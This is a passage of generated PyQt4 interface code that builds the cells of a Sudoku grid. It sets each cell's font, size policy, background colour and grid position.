self.label_7_7.setFont(font)
self.label_7_7.setAutoFillBackground(False)
self.label_7_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_7.setFrameShape(QtGui.QFrame.Panel)
self.label_7_7.setText(_fromUtf8(""))
self.label_7_7.setTextFormat(QtCore.Qt.PlainText)
self.label_7_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_7.setObjectName(_fromUtf8("label_7_7"))
self.gridLayout_9.addWidget(self.label_7_7, 1, 1, 1, 1)
self.label_8_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_7.sizePolicy().hasHeightForWidth())
self.label_8_7.setSizePolicy(sizePolicy)
self.label_8_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_7.setFont(font)
self.label_8_7.setAutoFillBackground(False)
self.label_8_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_7.setFrameShape(QtGui.QFrame.Panel)
self.label_8_7.setText(_fromUtf8(""))
self.label_8_7.setTextFormat(QtCore.Qt.PlainText)
self.label_8_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_7.setObjectName(_fromUtf8("label_8_7"))
self.gridLayout_9.addWidget(self.label_8_7, 2, 1, 1, 1)
self.label_6_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_6.sizePolicy().hasHeightForWidth())
self.label_6_6.setSizePolicy(sizePolicy)
self.label_6_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_6.setFont(font)
self.label_6_6.setAutoFillBackground(False)
self.label_6_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_6.setFrameShape(QtGui.QFrame.Panel)
self.label_6_6.setLineWidth(1)
self.label_6_6.setText(_fromUtf8(""))
self.label_6_6.setTextFormat(QtCore.Qt.PlainText)
self.label_6_6.setScaledContents(False)
self.label_6_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_6.setObjectName(_fromUtf8("label_6_6"))
self.gridLayout_9.addWidget(self.label_6_6, 0, 0, 1, 1)
self.label_7_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_8.sizePolicy().hasHeightForWidth())
self.label_7_8.setSizePolicy(sizePolicy)
self.label_7_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_8.setFont(font)
self.label_7_8.setAutoFillBackground(False)
self.label_7_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_8.setFrameShape(QtGui.QFrame.Panel)
self.label_7_8.setText(_fromUtf8(""))
self.label_7_8.setTextFormat(QtCore.Qt.PlainText)
self.label_7_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_8.setObjectName(_fromUtf8("label_7_8"))
self.gridLayout_9.addWidget(self.label_7_8, 1, 2, 1, 1)
self.label_8_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_8.sizePolicy().hasHeightForWidth())
self.label_8_8.setSizePolicy(sizePolicy)
self.label_8_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_8.setFont(font)
self.label_8_8.setAutoFillBackground(False)
self.label_8_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_8.setFrameShape(QtGui.QFrame.Panel)
self.label_8_8.setText(_fromUtf8(""))
self.label_8_8.setTextFormat(QtCore.Qt.PlainText)
self.label_8_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_8.setObjectName(_fromUtf8("label_8_8"))
self.gridLayout_9.addWidget(self.label_8_8, 2, 2, 1, 1)
self.label_6_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_7.sizePolicy().hasHeightForWidth())
self.label_6_7.setSizePolicy(sizePolicy)
self.label_6_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_7.setFont(font)
self.label_6_7.setAutoFillBackground(False)
self.label_6_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_7.setFrameShape(QtGui.QFrame.Panel)
self.label_6_7.setFrameShadow(QtGui.QFrame.Plain)
self.label_6_7.setText(_fromUtf8(""))
self.label_6_7.setTextFormat(QtCore.Qt.PlainText)
self.label_6_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_7.setObjectName(_fromUtf8("label_6_7"))
self.gridLayout_9.addWidget(self.label_6_7, 0, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_9, 2, 2, 1, 1)
self.gridLayout_3 = QtGui.QGridLayout()
self.gridLayout_3.setSpacing(0)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.label_1_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_8.sizePolicy().hasHeightForWidth())
self.label_1_8.setSizePolicy(sizePolicy)
self.label_1_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_8.setFont(font)
self.label_1_8.setAutoFillBackground(False)
self.label_1_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_8.setFrameShape(QtGui.QFrame.Panel)
self.label_1_8.setText(_fromUtf8(""))
self.label_1_8.setTextFormat(QtCore.Qt.PlainText)
self.label_1_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_8.setObjectName(_fromUtf8("label_1_8"))
self.gridLayout_3.addWidget(self.label_1_8, 1, 2, 1, 1)
self.label_0_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_7.sizePolicy().hasHeightForWidth())
self.label_0_7.setSizePolicy(sizePolicy)
self.label_0_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_7.setFont(font)
self.label_0_7.setAutoFillBackground(False)
self.label_0_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_7.setFrameShape(QtGui.QFrame.Panel)
self.label_0_7.setFrameShadow(QtGui.QFrame.Plain)
self.label_0_7.setText(_fromUtf8(""))
self.label_0_7.setTextFormat(QtCore.Qt.PlainText)
self.label_0_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_7.setObjectName(_fromUtf8("label_0_7"))
self.gridLayout_3.addWidget(self.label_0_7, 0, 1, 1, 1)
self.label_1_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_7.sizePolicy().hasHeightForWidth())
self.label_1_7.setSizePolicy(sizePolicy)
self.label_1_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_7.setFont(font)
self.label_1_7.setAutoFillBackground(False)
self.label_1_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_7.setFrameShape(QtGui.QFrame.Panel)
self.label_1_7.setText(_fromUtf8(""))
self.label_1_7.setTextFormat(QtCore.Qt.PlainText)
self.label_1_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_7.setObjectName(_fromUtf8("label_1_7"))
self.gridLayout_3.addWidget(self.label_1_7, 1, 1, 1, 1)
self.label_2_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_6.sizePolicy().hasHeightForWidth())
self.label_2_6.setSizePolicy(sizePolicy)
self.label_2_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_6.setFont(font)
self.label_2_6.setAutoFillBackground(False)
self.label_2_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_6.setFrameShape(QtGui.QFrame.Panel)
self.label_2_6.setText(_fromUtf8(""))
self.label_2_6.setTextFormat(QtCore.Qt.PlainText)
self.label_2_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_6.setObjectName(_fromUtf8("label_2_6"))
self.gridLayout_3.addWidget(self.label_2_6, 2, 0, 1, 1)
self.label_2_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_7.sizePolicy().hasHeightForWidth())
self.label_2_7.setSizePolicy(sizePolicy)
self.label_2_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_7.setFont(font)
self.label_2_7.setAutoFillBackground(False)
self.label_2_7.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_7.setFrameShape(QtGui.QFrame.Panel)
self.label_2_7.setText(_fromUtf8(""))
self.label_2_7.setTextFormat(QtCore.Qt.PlainText)
self.label_2_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_7.setObjectName(_fromUtf8("label_2_7"))
self.gridLayout_3.addWidget(self.label_2_7, 2, 1, 1, 1)
self.label_0_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_8.sizePolicy().hasHeightForWidth())
self.label_0_8.setSizePolicy(sizePolicy)
self.label_0_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_8.setFont(font)
self.label_0_8.setAutoFillBackground(False)
self.label_0_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_8.setFrameShape(QtGui.QFrame.Panel)
self.label_0_8.setText(_fromUtf8(""))
self.label_0_8.setTextFormat(QtCore.Qt.PlainText)
self.label_0_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_8.setObjectName(_fromUtf8("label_0_8"))
self.gridLayout_3.addWidget(self.label_0_8, 0, 2, 1, 1)
self.label_2_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_8.sizePolicy().hasHeightForWidth())
self.label_2_8.setSizePolicy(sizePolicy)
self.label_2_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_8.setFont(font)
self.label_2_8.setAutoFillBackground(False)
self.label_2_8.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_8.setFrameShape(QtGui.QFrame.Panel)
self.label_2_8.setText(_fromUtf8(""))
self.label_2_8.setTextFormat(QtCore.Qt.PlainText)
self.label_2_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_8.setObjectName(_fromUtf8("label_2_8"))
self.gridLayout_3.addWidget(self.label_2_8, 2, 2, 1, 1)
self.label_1_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_6.sizePolicy().hasHeightForWidth())
self.label_1_6.setSizePolicy(sizePolicy)
self.label_1_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_6.setFont(font)
self.label_1_6.setAutoFillBackground(False)
self.label_1_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_6.setFrameShape(QtGui.QFrame.Panel)
self.label_1_6.setText(_fromUtf8(""))
self.label_1_6.setTextFormat(QtCore.Qt.PlainText)
self.label_1_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_6.setObjectName(_fromUtf8("label_1_6"))
self.gridLayout_3.addWidget(self.label_1_6, 1, 0, 1, 1)
self.label_0_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_6.sizePolicy().hasHeightForWidth())
self.label_0_6.setSizePolicy(sizePolicy)
self.label_0_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_6.setFont(font)
self.label_0_6.setAutoFillBackground(False)
self.label_0_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_6.setFrameShape(QtGui.QFrame.Panel)
self.label_0_6.setLineWidth(1)
self.label_0_6.setText(_fromUtf8(""))
self.label_0_6.setTextFormat(QtCore.Qt.PlainText)
self.label_0_6.setScaledContents(False)
self.label_0_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_6.setObjectName(_fromUtf8("label_0_6"))
self.gridLayout_3.addWidget(self.label_0_6, 0, 0, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_3, 0, 2, 1, 1)
self.gridLayout_8 = QtGui.QGridLayout()
self.gridLayout_8.setSpacing(0)
self.gridLayout_8.setObjectName(_fromUtf8("gridLayout_8"))
self.label_6_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_3.sizePolicy().hasHeightForWidth())
self.label_6_3.setSizePolicy(sizePolicy)
self.label_6_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_3.setFont(font)
self.label_6_3.setAutoFillBackground(False)
self.label_6_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_6_3.setFrameShape(QtGui.QFrame.Panel)
self.label_6_3.setLineWidth(1)
self.label_6_3.setText(_fromUtf8(""))
self.label_6_3.setTextFormat(QtCore.Qt.PlainText)
self.label_6_3.setScaledContents(False)
self.label_6_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_3.setObjectName(_fromUtf8("label_6_3"))
self.gridLayout_8.addWidget(self.label_6_3, 0, 0, 1, 1)
self.label_8_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_3.sizePolicy().hasHeightForWidth())
self.label_8_3.setSizePolicy(sizePolicy)
self.label_8_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_3.setFont(font)
self.label_8_3.setAutoFillBackground(False)
self.label_8_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_8_3.setFrameShape(QtGui.QFrame.Panel)
self.label_8_3.setText(_fromUtf8(""))
self.label_8_3.setTextFormat(QtCore.Qt.PlainText)
self.label_8_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_3.setObjectName(_fromUtf8("label_8_3"))
self.gridLayout_8.addWidget(self.label_8_3, 2, 0, 1, 1)
self.label_7_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_4.sizePolicy().hasHeightForWidth())
self.label_7_4.setSizePolicy(sizePolicy)
self.label_7_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_4.setFont(font)
self.label_7_4.setAutoFillBackground(False)
self.label_7_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_7_4.setFrameShape(QtGui.QFrame.Panel)
self.label_7_4.setText(_fromUtf8(""))
self.label_7_4.setTextFormat(QtCore.Qt.PlainText)
self.label_7_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_4.setObjectName(_fromUtf8("label_7_4"))
self.gridLayout_8.addWidget(self.label_7_4, 1, 1, 1, 1)
self.label_6_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_4.sizePolicy().hasHeightForWidth())
self.label_6_4.setSizePolicy(sizePolicy)
self.label_6_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_4.setFont(font)
self.label_6_4.setAutoFillBackground(False)
self.label_6_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_6_4.setFrameShape(QtGui.QFrame.Panel)
self.label_6_4.setFrameShadow(QtGui.QFrame.Plain)
self.label_6_4.setText(_fromUtf8(""))
self.label_6_4.setTextFormat(QtCore.Qt.PlainText)
self.label_6_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_4.setObjectName(_fromUtf8("label_6_4"))
self.gridLayout_8.addWidget(self.label_6_4, 0, 1, 1, 1)
self.label_7_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_3.sizePolicy().hasHeightForWidth())
self.label_7_3.setSizePolicy(sizePolicy)
self.label_7_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_3.setFont(font)
self.label_7_3.setAutoFillBackground(False)
self.label_7_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_7_3.setFrameShape(QtGui.QFrame.Panel)
self.label_7_3.setText(_fromUtf8(""))
self.label_7_3.setTextFormat(QtCore.Qt.PlainText)
self.label_7_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_3.setObjectName(_fromUtf8("label_7_3"))
self.gridLayout_8.addWidget(self.label_7_3, 1, 0, 1, 1)
self.label_8_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_4.sizePolicy().hasHeightForWidth())
self.label_8_4.setSizePolicy(sizePolicy)
self.label_8_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_4.setFont(font)
self.label_8_4.setAutoFillBackground(False)
self.label_8_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_8_4.setFrameShape(QtGui.QFrame.Panel)
self.label_8_4.setText(_fromUtf8(""))
self.label_8_4.setTextFormat(QtCore.Qt.PlainText)
self.label_8_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_4.setObjectName(_fromUtf8("label_8_4"))
self.gridLayout_8.addWidget(self.label_8_4, 2, 1, 1, 1)
self.label_6_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_5.sizePolicy().hasHeightForWidth())
self.label_6_5.setSizePolicy(sizePolicy)
self.label_6_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_5.setFont(font)
self.label_6_5.setAutoFillBackground(False)
self.label_6_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_6_5.setFrameShape(QtGui.QFrame.Panel)
self.label_6_5.setText(_fromUtf8(""))
self.label_6_5.setTextFormat(QtCore.Qt.PlainText)
self.label_6_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_5.setObjectName(_fromUtf8("label_6_5"))
self.gridLayout_8.addWidget(self.label_6_5, 0, 2, 1, 1)
self.label_7_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_5.sizePolicy().hasHeightForWidth())
self.label_7_5.setSizePolicy(sizePolicy)
self.label_7_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_5.setFont(font)
self.label_7_5.setAutoFillBackground(False)
self.label_7_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_7_5.setFrameShape(QtGui.QFrame.Panel)
self.label_7_5.setText(_fromUtf8(""))
self.label_7_5.setTextFormat(QtCore.Qt.PlainText)
self.label_7_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_5.setObjectName(_fromUtf8("label_7_5"))
self.gridLayout_8.addWidget(self.label_7_5, 1, 2, 1, 1)
self.label_8_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_5.sizePolicy().hasHeightForWidth())
self.label_8_5.setSizePolicy(sizePolicy)
self.label_8_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_5.setFont(font)
self.label_8_5.setAutoFillBackground(False)
self.label_8_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_8_5.setFrameShape(QtGui.QFrame.Panel)
self.label_8_5.setText(_fromUtf8(""))
self.label_8_5.setTextFormat(QtCore.Qt.PlainText)
self.label_8_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_5.setObjectName(_fromUtf8("label_8_5"))
self.gridLayout_8.addWidget(self.label_8_5, 2, 2, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_8, 2, 1, 1, 1)
self.gridLayout_4 = QtGui.QGridLayout()
self.gridLayout_4.setSpacing(0)
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.label_3_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_2.sizePolicy().hasHeightForWidth())
self.label_3_2.setSizePolicy(sizePolicy)
self.label_3_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_2.setFont(font)
self.label_3_2.setAutoFillBackground(False)
self.label_3_2.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_2.setFrameShape(QtGui.QFrame.Panel)
self.label_3_2.setText(_fromUtf8(""))
self.label_3_2.setTextFormat(QtCore.Qt.PlainText)
self.label_3_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_2.setObjectName(_fromUtf8("label_3_2"))
self.gridLayout_4.addWidget(self.label_3_2, 0, 2, 1, 1)
self.label_4_1 = SudokuCell(self.sudokugrid)
